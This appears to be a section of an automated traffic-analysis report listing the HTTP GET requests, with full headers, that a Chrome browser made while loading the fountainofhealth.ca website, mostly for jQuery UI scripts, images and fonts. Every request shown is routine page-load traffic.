                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/jquery-patch-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/scroll-parent-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/Poppins-Regular.ttf HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveOrigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/keycode-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-active-element-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-blur-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/controlgroup-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/checkboxradio-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/draggable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/resizable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/dialog-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/progress.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
